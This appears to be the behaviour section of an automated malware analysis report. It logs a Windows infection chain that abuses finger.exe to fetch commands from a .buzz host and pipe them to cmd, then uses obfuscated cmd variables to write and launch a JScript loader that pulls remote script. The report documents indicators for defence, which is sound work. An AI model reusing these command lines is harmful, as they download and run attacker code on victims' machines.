Technical Information
- '<SYSTEM32>\finger.exe' ok@lbawe.dfaser.buzz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\Z0p.js"
- C:\users\public\z0p.js
- 'lb###.dfaser.buzz':79
- '5s####.vcbuyiup.buzz':80
- 'lb###.dfaser.buzz':79
- DNS ASK lb###.dfaser.buzz
- DNS ASK 5s####.vcbuyiup.buzz
- '<SYSTEM32>\cmd.exe' /c finger ok@lbawe.dfaser.buzz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt RCAJ=.j&&SEt SFQFT=vLZCWarLZCW a =LZCW 'scLZCWriLZCWptLZCW:'; b =LZCW 'hLZCWTtPLZCW:'; GLZCWetLZCWObjLZCWecLZCWt(LZCWa+b+'&&sET 17N4=OMMXLOMMXL5soukc.vcbuyiup.buzzOMMXL?1OMMXL')&&sE...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p XE3EM="%SFQFT:LZCW=%%17N4:OMMXL=/%" 0<nul 1>C:\Users\Public\Z0p%RCAJ%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\Z0p%RCAJ%s "
- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\Z0p.js